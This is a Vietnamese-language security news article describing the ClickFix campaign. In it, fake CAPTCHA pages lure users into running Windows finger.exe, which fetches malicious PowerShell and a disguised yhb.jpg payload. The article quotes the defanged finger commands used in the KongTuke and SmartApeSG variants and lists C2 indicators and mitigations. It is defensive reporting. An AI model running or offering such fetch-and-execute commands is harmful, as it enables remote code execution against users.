ClickFix: Mối đe dọa mạng nguy hiểm từ Finger.exe

Một chiến dịch kỹ thuật xã hội mới, được đặt tên là ClickFix, đã được phát hiện. Chiến dịch này tận dụng một công cụ dòng lệnh Windows cũ là finger.exe để cài đặt mã độc vào hệ thống của nạn nhân, tạo ra một mối đe dọa mạng đáng kể.

Cuộc tấn công bắt đầu bằng một trang xác minh CAPTCHA lừa đảo, đánh lừa người dùng chạy một script khởi động quá trình lây nhiễm. Kỹ thuật này đã được sử dụng từ tháng 11 năm 2025 và vẫn duy trì là một mối đe dọa mạng dai dẳng.

Chiến dịch ClickFix: Mối đe dọa mạng khai thác công cụ cũ

Phương thức Social Engineering tinh vi

Chiến dịch ClickFix khai thác sự thiếu cảnh giác của người dùng thông qua các trang CAPTCHA giả mạo. Các trang này được thiết kế để dụ dỗ nạn nhân thực thi một lệnh có vẻ vô hại.

Khi người dùng tương tác với trang CAPTCHA lừa đảo, họ sẽ được yêu cầu chạy một script. Script này sau đó kích hoạt tiến trình lây nhiễm bằng cách sử dụng công cụ finger.exe tích hợp sẵn trong Windows.

Vai trò của Finger.exe và TCP Port 79

Điểm độc đáo của chiến dịch này là việc lạm dụng giao thức finger. Đây là một công cụ mạng cũ dùng để truy xuất thông tin người dùng, thường hoạt động trên TCP port 79.

Các tác nhân đe dọa lợi dụng tiện ích tưởng chừng vô hại này để tải về các payload độc hại từ các máy chủ từ xa. Phương pháp này cho phép chúng vượt qua một số biện pháp bảo mật không được cấu hình để giám sát hoặc chặn lưu lượng truy cập qua TCP port 79, góp phần tạo nên một mối đe dọa mạng khó phát hiện.

Ví dụ về các biện pháp bảo mật có thể bị bỏ qua bao gồm tường lửa hoặc proxy không được cấu hình để kiểm tra giao thức ít phổ biến này. Điều này tạo ra một lỗ hổng trong phòng thủ, làm tăng rủi ro hệ thống bị xâm nhập.

Thông tin chi tiết về việc tăng cường các biện pháp bảo mật trong các nền tảng quảng cáo kỹ thuật số có thể tham khảo tại CybersecurityNews.com.

Phân tích các Chiến dịch cụ thể: KongTuke và SmartApeSG

Các nhà phân tích từ Internet Storm Center (ISC) SANS đã ghi nhận và theo dõi hoạt động này, xác định hai chiến dịch nổi bật sử dụng kỹ thuật tương tự: KongTuke và SmartApeSG. Cả hai đều sử dụng các trang CAPTCHA giả mạo để lôi kéo người dùng thực hiện lệnh finger ban đầu, cho thấy một phương pháp luận chung đối phó với mối đe dọa mạng này.

Xem thêm phân tích từ ISC SANS tại isc.sans.edu.

Chiến dịch KongTuke

Khi thực thi, lệnh finger trong chiến dịch KongTuke sẽ liên hệ với một máy chủ điều khiển và ra lệnh (C2). Ví dụ, một lệnh điển hình có thể trông như sau:

finger gcaptcha@captchaver[.]top

Máy chủ C2 phản hồi bằng một lệnh PowerShell chứa văn bản được mã hóa Base64. Lệnh PowerShell này sau đó sẽ được thực thi trên máy của người dùng, tiến hành các hoạt động độc hại tiếp theo.

Quá trình này cho phép mã độc thiết lập chỗ đứng trên hệ thống bị ảnh hưởng. Các lệnh PowerShell thường được sử dụng trong các cuộc tấn công mạng phức tạp để duy trì sự bền bỉ và thực thi payload.

Chiến dịch SmartApeSG

Chiến dịch SmartApeSG hoạt động tương tự, sử dụng một lệnh như sau để truy xuất script độc hại:

finger [email protected][.]108

Script được truy xuất sau đó tải xuống và thực thi một tệp tin độc hại. Cụ thể, script này được ghi nhận là tải về một tệp có tên yhb.jpg, trong đó chứa payload độc hại.

Tệp yhb.jpg không phải là hình ảnh mà là một vỏ bọc để che giấu mã độc, một kỹ thuật thường thấy trong các cuộc tấn công mạng.

Quá trình nhiều giai đoạn này cho phép mã độc thiết lập một foothold vững chắc trên hệ thống bị xâm nhập, thường xuyên tránh được sự phát hiện ban đầu.

IOCs (Indicators of Compromise)

Để hỗ trợ phát hiện và phòng ngừa mối đe dọa mạng này, các chỉ số thỏa hiệp (IOCs) sau đây đã được xác định:

• Miền C2: captchaver[.]top
• Địa chỉ IP C2: 91.193.19[.]108
• Tên tệp payload: yhb.jpg

Các tổ chức nên cấu hình hệ thống giám sát mạng để phát hiện các kết nối tới các IOCs này và các hoạt động bất thường liên quan đến finger.exe, nhằm giảm thiểu mối đe dọa mạng tiềm tàng.

Tác động và Khuyến nghị Phòng ngừa

Rủi ro và Ảnh hưởng đến Hệ thống

Trong khi nhiều mạng lưới doanh nghiệp có thể chặn TCP port 79 thông qua các proxy tường minh, nhiều hệ thống vẫn dễ bị tổn thương nếu cổng này không được chặn rõ ràng. Điều này khiến các cuộc tấn công mạng như ClickFix trở thành mối lo ngại liên tục đối với các quản trị viên mạng.

Sự tiếp tục sử dụng chiến thuật này nhấn mạnh hiệu quả của nó trong các môi trường nơi các giao thức cũ không được bảo vệ đầy đủ, tạo nên một mối đe dọa mạng liên tục. Hệ thống bị xâm nhập có thể dẫn đến mất dữ liệu, gián đoạn hoạt động và thiệt hại tài chính đáng kể, là hậu quả trực tiếp từ các mối đe dọa mạng như vậy.

Biện pháp Giảm thiểu Mối đe dọa

Để giảm thiểu mối đe dọa mạng từ các chiến dịch như ClickFix, các tổ chức nên thực hiện các biện pháp sau:

• Chặn TCP Port 79: Cấu hình tường lửa và thiết bị bảo mật mạng để chặn lưu lượng truy cập đi và đến trên TCP port 79, trừ khi có yêu cầu kinh doanh cụ thể.
• Đào tạo Nhận thức Người dùng: Thường xuyên đào tạo nhân viên về các kỹ thuật lừa đảo qua social engineering, đặc biệt là các trang CAPTCHA giả mạo và nguy cơ chạy các script không xác định.
• Giám sát Mạng: Triển khai các giải pháp giám sát mạng mạnh mẽ (ví dụ: IDS/IPS, SIEM) để phát hiện các hoạt động bất thường, bao gồm việc sử dụng finger.exe hoặc kết nối đến các máy chủ C2 đã biết.
• Quản lý Quyền hạn: Hạn chế quyền thực thi các lệnh dòng lệnh và script của người dùng, đặc biệt đối với các ứng dụng không cần thiết.
• Cập nhật Hệ thống: Đảm bảo tất cả hệ thống và phần mềm đều được vá và cập nhật đầy đủ để giảm thiểu các lỗ hổng khác mà kẻ tấn công có thể khai thác.

Việc chủ động quản lý rủi ro và áp dụng các biện pháp bảo mật đa lớp là rất quan trọng để bảo vệ chống lại các hình thức mối đe dọa mạng ngày càng tinh vi.